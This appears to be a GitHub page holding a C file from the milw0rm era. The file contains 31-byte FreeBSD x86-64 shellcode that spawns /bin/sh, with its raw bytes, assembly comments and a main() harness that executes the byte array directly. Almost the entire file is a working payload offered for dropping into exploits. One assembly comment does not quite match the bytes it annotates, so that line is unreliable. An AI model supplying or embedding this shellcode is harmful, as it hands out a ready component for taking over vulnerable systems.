-
Notifications
You must be signed in to change notification settings - Fork 1
/
shellcode-106.c
executable file
·58 lines (51 loc) · 1.83 KB
/
shellcode-106.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
/**
*
* _ _ _ ____ _ _
* | | | | __ _ ___| | ___ __ | _ \ ___ | | |
* | |_| |/ _` |/ __| |/ / '_ \ | |_) / _ \| | |
* | _ | (_| | (__| <| | | | | _ < (_) | | |
* |_| |_|\__,_|\___|_|\_\_| |_| |_| \_\___/|_|_|
* [ http://www.hacknroll.com ]
*
* Description:
* FreeBSD x86-64 exec("/bin/sh") Shellcode - 31 bytes
*
*
*
* Authors:
* Maycon M. Vitali ( 0ut0fBound )
* Milw0rm .: http://www.milw0rm.com/author/869
* Page ....: http://maycon.hacknroll.com
* Email ...: [email protected]
*
* Anderson Eduardo ( c0d3_z3r0 )
* Milw0rm .: http://www.milw0rm.com/author/1570
* Page ....: http://anderson.hacknroll.com
* Email ...: [email protected]
*
* -------------------------------------------------------
*
* amd64# gcc hacknroll.c -o hacknroll
* amd64# ./hacknroll
* # exit
* amd64#
*
* -------------------------------------------------------
*/
const char shellcode[] =
"\x48\x31\xc0" // xor %rax,%rax
"\x99" // cltd
"\xb0\x3b" // mov $0x3b,%al
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622fff,%rdi
"\x48\xc1\xef\x08" // shr $0x8,%rdi
"\x57" // push %rdi
"\x48\x89\xe7" // mov %rsp,%rdi
"\x57" // push %rdi
"\x52" // push %rdx
"\x48\x89\xe6" // mov %rsp,%rsi
"\x0f\x05"; // syscall
int main(void)
{
(*(void (*)()) shellcode)();
return 0;
}